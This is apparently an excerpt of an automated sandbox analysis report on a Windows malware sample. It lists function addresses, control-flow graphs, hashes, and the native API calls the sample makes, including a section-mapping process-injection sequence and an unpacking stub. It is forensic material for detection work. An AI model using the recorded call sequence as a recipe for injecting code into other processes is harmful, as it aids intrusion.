NtMapViewOfSection 3833->3834 3834->3831 3839 8492de 3842 8492ef 3839->3842 3843 8492fe 3842->3843 3846 849a8f 3843->3846 3848 849aaa 3846->3848 3847 849ab3 CreateToolhelp32Snapshot 3847->3848 3849 849acf Module32First 3847->3849 3848->3847 3848->3849 3850 849ade 3849->3850 3852 8492ee 3849->3852 3853 84974e 3850->3853 3854 849779 3853->3854 3855 8497c2 3854->3855 3856 84978a VirtualAlloc 3854->3856 3855->3855 3856->3855 3857 4014de 3858 401447 3857->3858 3859 4015e6 NtDuplicateObject 3858->3859 3868 40152f 3858->3868 3860 401603 NtCreateSection 3859->3860 3859->3868 3861 401683 NtCreateSection 3860->3861 3862 401629 NtMapViewOfSection 3860->3862 3863 4016af 3861->3863 3861->3868 3862->3861 3864 40164c NtMapViewOfSection 3862->3864 3866 4016b9 NtMapViewOfSection 3863->3866 3863->3868 3864->3861 3865 40166a 3864->3865 3865->3861 3867 4016e0 NtMapViewOfSection 3866->3867 3866->3868 3867->3868

                                                Executed Functions

                                                Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 138 401496-4014a5 139 4014a7 138->139 140 40151b-40152d 138->140 142 4014a9-4014b5 139->142 143 4014cf 139->143 149 4014ba 140->149 152 40152f-401535 140->152 146 401471-401472 142->146 147 4014b7-4014b8 142->147 144 4014d6 143->144 144->144 150 4014d8 144->150 151 401473-401484 146->151 148 401449 147->148 147->149 156 40147b-40148e call 4011b7 148->156 157 40144b 148->157 153 401447-401456 149->153 154 4014bc-4014c3 149->154 150->140 151->156 162 40144c-401470 153->162 158 4014c5-4014c8 154->158 159 401539-401567 154->159 156->138 157->162 158->143 172 401558-401563 159->172 173 40156a-401590 call 4011b7 159->173 162->151 172->173 180 401592 173->180 181 401595-40159a 173->181 180->181 183 4015a0-4015b1 181->183 184 4018b8-4018c0 181->184 188 4018b6-4018c5 183->188 189 4015b7-4015e0 183->189 184->181 192 4018da 188->192 193 4018cb-4018d6 188->193 189->188 197 4015e6-4015fd NtDuplicateObject 189->197 192->193 194 4018dd-401915 call 4011b7 192->194 193->194 197->188 199 401603-401627 NtCreateSection 197->199 201 401683-4016a9 NtCreateSection 199->201 202 401629-40164a NtMapViewOfSection 199->202 201->188 205 4016af-4016b3 201->205 202->201 206 40164c-401668 NtMapViewOfSection 202->206 205->188 209 4016b9-4016da NtMapViewOfSection 205->209 206->201 208 40166a-401680 206->208 208->201 209->188 211 4016e0-4016fc NtMapViewOfSection 209->211 211->188 214 401702 call 401707 211->214
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                                Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 216 401538-401567 222 401558-401563 216->222 223 40156a-401590 call 4011b7 216->223 222->223 230 401592 223->230 231 401595-40159a 223->231 230->231 233 4015a0-4015b1 231->233 234 4018b8-4018c0 231->234 238 4018b6-4018c5 233->238 239 4015b7-4015e0 233->239 234->231 242 4018da 238->242 243 4018cb-4018d6 238->243 239->238 247 4015e6-4015fd NtDuplicateObject 239->247 242->243 244 4018dd-401915 call 4011b7 242->244 243->244 247->238 249 401603-401627 NtCreateSection 247->249 251 401683-4016a9 NtCreateSection 249->251 252 401629-40164a NtMapViewOfSection 249->252 251->238 255 4016af-4016b3 251->255 252->251 256 40164c-401668 NtMapViewOfSection 252->256 255->238 259 4016b9-4016da NtMapViewOfSection 255->259 256->251 258 40166a-401680 256->258 258->251 259->238 261 4016e0-4016fc NtMapViewOfSection 259->261 261->238 264 401702 call 401707 261->264
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                                Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 266 4014de-4014ed 267 401563 266->267 268 4014ef 266->268 271 40156a-401590 call 4011b7 267->271 269 401551-401552 268->269 270 4014f1-401502 268->270 269->267 272 401504-401516 270->272 273 40151d-40152d 270->273 291 401592 271->291 292 401595-40159a 271->292 275 40151b-40151c 272->275 278 4014ba 273->278 279 40152f-401535 273->279 275->273 281 401447-401456 278->281 282 4014bc-4014c3 278->282 288 40144c-401470 281->288 284 4014c5-4014c8 282->284 285 401539-401567 282->285 289 4014cf 284->289 285->271 305 401558-401560 285->305 304 401473-401484 288->304 294 4014d6 289->294 291->292 300 4015a0-4015b1 292->300 301 4018b8-4018c0 292->301 294->294 298 4014d8 294->298 298->275 311 4018b6-4018c5 300->311 312 4015b7-4015e0 300->312 301->292 310 40147b-4014a5 call 4011b7 304->310 305->267 310->275 324 4014a7 310->324 318 4018da 311->318 319 4018cb-4018d6 311->319 312->311 325 4015e6-4015fd NtDuplicateObject 312->325 318->319 320 4018dd-401915 call 4011b7 318->320 319->320 324->289 327 4014a9-4014b5 324->327 325->311 328 401603-401627 NtCreateSection 325->328 330 401471-401472 327->330 331 4014b7-4014b8 327->331 333 401683-4016a9 NtCreateSection 328->333 334 401629-40164a NtMapViewOfSection 328->334 330->304 331->278 332 401449 331->332 332->310 338 40144b 332->338 333->311 337 4016af-4016b3 333->337 334->333 339 40164c-401668 NtMapViewOfSection 334->339 337->311 342 4016b9-4016da NtMapViewOfSection 337->342 338->288 339->333 341 40166a-401680 339->341 341->333 342->311 344 4016e0-4016fc NtMapViewOfSection 342->344 344->311 347 401702 call 401707 344->347
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                                Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 349 401543-401544 350 401546-401567 349->350 351 4015af-4015b1 349->351 360 401558-401563 350->360 361 40156a-401590 call 4011b7 350->361 353 4018b6-4018c5 351->353 354 4015b7-4015e0 351->354 358 4018da 353->358 359 4018cb-4018d6 353->359 354->353 369 4015e6-4015fd NtDuplicateObject 354->369 358->359 363 4018dd-401915 call 4011b7 358->363 359->363 360->361 380 401592 361->380 381 401595-40159a 361->381 369->353 372 401603-401627 NtCreateSection 369->372 375 401683-4016a9 NtCreateSection 372->375 376 401629-40164a NtMapViewOfSection 372->376 375->353 379 4016af-4016b3 375->379 376->375 382 40164c-401668 NtMapViewOfSection 376->382 379->353 385 4016b9-4016da NtMapViewOfSection 379->385 380->381 391 4015a0-4015ad 381->391 392 4018b8-4018c0 381->392 382->375 384 40166a-401680 382->384 384->375 385->353 388 4016e0-4016fc NtMapViewOfSection 385->388 388->353 393 401702 call 401707 388->393 391->351 392->381
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                                Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 401565-401590 call 4011b7 402 401592 397->402 403 401595-40159a 397->403 402->403 405 4015a0-4015b1 403->405 406 4018b8-4018c0 403->406 410 4018b6-4018c5 405->410 411 4015b7-4015e0 405->411 406->403 414 4018da 410->414 415 4018cb-4018d6 410->415 411->410 419 4015e6-4015fd NtDuplicateObject 411->419 414->415 416 4018dd-401915 call 4011b7 414->416 415->416 419->410 421 401603-401627 NtCreateSection 419->421 423 401683-4016a9 NtCreateSection 421->423 424 401629-40164a NtMapViewOfSection 421->424 423->410 427 4016af-4016b3 423->427 424->423 428 40164c-401668 NtMapViewOfSection 424->428 427->410 431 4016b9-4016da NtMapViewOfSection 427->431 428->423 430 40166a-401680 428->430 430->423 431->410 433 4016e0-4016fc NtMapViewOfSection 431->433 433->410 436 401702 call 401707 433->436
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                                Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 438 401579-401590 call 4011b7 444 401592 438->444 445 401595-40159a 438->445 444->445 447 4015a0-4015b1 445->447 448 4018b8-4018c0 445->448 452 4018b6-4018c5 447->452 453 4015b7-4015e0 447->453 448->445 456 4018da 452->456 457 4018cb-4018d6 452->457 453->452 461 4015e6-4015fd NtDuplicateObject 453->461 456->457 458 4018dd-401915 call 4011b7 456->458 457->458 461->452 463 401603-401627 NtCreateSection 461->463 465 401683-4016a9 NtCreateSection 463->465 466 401629-40164a NtMapViewOfSection 463->466 465->452 469 4016af-4016b3 465->469 466->465 470 40164c-401668 NtMapViewOfSection 466->470 469->452 473 4016b9-4016da NtMapViewOfSection 469->473 470->465 472 40166a-401680 470->472 472->465 473->452 475 4016e0-4016fc NtMapViewOfSection 473->475 475->452 478 401702 call 401707 475->478
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                                Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 40157c-401590 call 4011b7 484 401592 480->484 485 401595-40159a 480->485 484->485 487 4015a0-4015b1 485->487 488 4018b8-4018c0 485->488 492 4018b6-4018c5 487->492 493 4015b7-4015e0 487->493 488->485 496 4018da 492->496 497 4018cb-4018d6 492->497 493->492 501 4015e6-4015fd NtDuplicateObject 493->501 496->497 498 4018dd-401915 call 4011b7 496->498 497->498 501->492 503 401603-401627 NtCreateSection 501->503 505 401683-4016a9 NtCreateSection 503->505 506 401629-40164a NtMapViewOfSection 503->506 505->492 509 4016af-4016b3 505->509 506->505 510 40164c-401668 NtMapViewOfSection 506->510 509->492 513 4016b9-4016da NtMapViewOfSection 509->513 510->505 512 40166a-401680 510->512 512->505 513->492 515 4016e0-4016fc NtMapViewOfSection 513->515 515->492 518 401702 call 401707 515->518
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                                Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 520 402fe9-40300d 521 403140-403145 520->521 522 403013-40302b 520->522 522->521 523 403031-403042 522->523 524 403044-40304d 523->524 525 403052-403060 524->525 525->525 526 403062-403069 525->526 527 40308b-403092 526->527 528 40306b-40308a 526->528 529 4030b4-4030b7 527->529 530 403094-4030b3 527->530 528->527 531 4030c0 529->531 532 4030b9-4030bc 529->532 530->529 531->524 534 4030c2-4030c7 531->534 532->531 533 4030be 532->533 533->534 534->521 535 4030c9-4030cc 534->535 535->521 536 4030ce-40313d RtlCreateUserThread NtTerminateProcess 535->536 536->521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120635502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                                Function 00849A8F Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 537 849a8f-849aa8 538 849aaa-849aac 537->538 539 849ab3-849abf CreateToolhelp32Snapshot 538->539 540 849aae 538->540 541 849ac1-849ac7 539->541 542 849acf-849adc Module32First 539->542 540->539 541->542 547 849ac9-849acd 541->547 543 849ae5-849aed 542->543 544 849ade-849adf call 84974e 542->544 548 849ae4 544->548 547->538 547->542 548->543
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00849AB7
                                                • Module32First.KERNEL32(00000000,00000224), ref: 00849AD7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Offset: 00846000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_846000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: 49a69dca407ef4f7db63fca89377f5ecc6a57d7f32353e116607f76b8eb50db3
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: ECF062321007286FD7307AF9AD8DB6F76E8FF49724F140528E686D60C0DA70EC454661
                                                Function 00417C57 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 167timelibraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CD8
                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417CEF
                                                • GetAtomNameW.KERNEL32(00000000,00000000,00000000), ref: 00417CF8
                                                • AreFileApisANSI.KERNEL32 ref: 00417CFE
                                                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00417D06
                                                • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00417D0F
                                                • GetCommMask.KERNELBASE(00000000,00000000), ref: 00417D3F
                                                • GetLastError.KERNEL32 ref: 00417D45
                                                • ZombifyActCtx.KERNEL32(00000000), ref: 00417D58
                                                • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00417D67
                                                • OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D8C
                                                • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00417D95
                                                  • Part of subcall function 004179AD: LocalAlloc.KERNELBASE(00000000,00417DE5), ref: 004179B5
                                                • LoadLibraryA.KERNELBASE(004193D8), ref: 00417E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2120667352.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleTimerWaitable$AliasesAllocApisAtomCommCreateDateDecrementEnumErrorFileFormatsInterlockedLastLibraryLoadLocalMaskMountNameOpenPointVolumeWriteZombify
                                                • String ID: tl_$}$
                                                • API String ID: 1277400812-2845185508
                                                • Opcode ID: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction ID: 05c418657806d1e3c5604e16026e84f417cc0deeb5e126f930ec35500030948a
                                                • Opcode Fuzzy Hash: 51d45e83e475c99cd7aa5bd50a4591079eb361b0ed041a489ec9c850fbcfa93b
                                                • Instruction Fuzzy Hash: 2F51C4705051289BC721AB21ED499DF3BB8EF09354B11847EF105E2161DB3C4DC6CBAD
                                                Function 005B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 53 5b003c-5b0047 54 5b0049 53->54 55 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 53->55 54->55 70 5b028b-5b0292 55->70 71 5b0265-5b0289 call 5b0a69 55->71 73 5b02a1-5b02b0 70->73 75 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 71->75 73->75 76 5b02b2-5b02cc 73->76 82 5b03d1-5b03e0 75->82 76->73 83 5b0439-5b04b8 VirtualFree 82->83 84 5b03e2-5b0437 call 5b0ce7 82->84 86 5b04be-5b04cd 83->86 87 5b05f4-5b05fe 83->87 84->82 91 5b04d3-5b04dd 86->91 88 5b077f-5b0789 87->88 89 5b0604-5b060d 87->89 95 5b078b-5b07a3 88->95 96 5b07a6-5b07b0 88->96 89->88 92 5b0613-5b0637 89->92 91->87 94 5b04e3-5b0505 91->94 99 5b063e-5b0648 92->99 103 5b0517-5b0520 94->103 104 5b0507-5b0515 94->104 95->96 97 5b086e-5b08be LoadLibraryA 96->97 98 5b07b6-5b07cb 96->98 108 5b08c7-5b08f9 97->108 100 5b07d2-5b07d5 98->100 99->88 101 5b064e-5b065a 99->101 105 5b07d7-5b07e0 100->105 106 5b0824-5b0833 100->106 101->88 107 5b0660-5b066a 101->107 109 5b0526-5b0547 103->109 104->109 110 5b07e2 105->110 111 5b07e4-5b0822 105->111 113 5b0839-5b083c 106->113 112 5b067a-5b0689 107->112 114 5b08fb-5b0901 108->114 115 5b0902-5b091d 108->115 116 5b054d-5b0550 109->116 110->106 111->100 117 5b068f-5b06b2 112->117 118 5b0750-5b077a 112->118 113->97 119 5b083e-5b0847 113->119 114->115 121 5b05e0-5b05ef 116->121 122 5b0556-5b056b 116->122 123 5b06ef-5b06fc 117->123 124 5b06b4-5b06ed 117->124 118->99 125 5b084b-5b086c 119->125 126 5b0849 119->126 121->91 127 5b056f-5b057a 122->127 128 5b056d 122->128 129 5b074b 123->129 130 5b06fe-5b0748 123->130 124->123 125->113 126->97 131 5b059b-5b05bb 127->131 132 5b057c-5b0599 127->132 128->121 129->112 130->129 137 5b05bd-5b05db 131->137 132->137 137->116
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5b0000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14
                                                Function 005B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 550 5b0e0f-5b0e24 SetErrorMode * 2 551 5b0e2b-5b0e2c 550->551 552 5b0e26 550->552 552->551
                                                APIs
                                                • SetErrorMode.KERNELBASE(00000400,?,?,005B0223,?,?), ref: 005B0E19
                                                • SetErrorMode.KERNELBASE(00000000,?,?,005B0223,?,?), ref: 005B0E1E
                                                Memory Dump Source
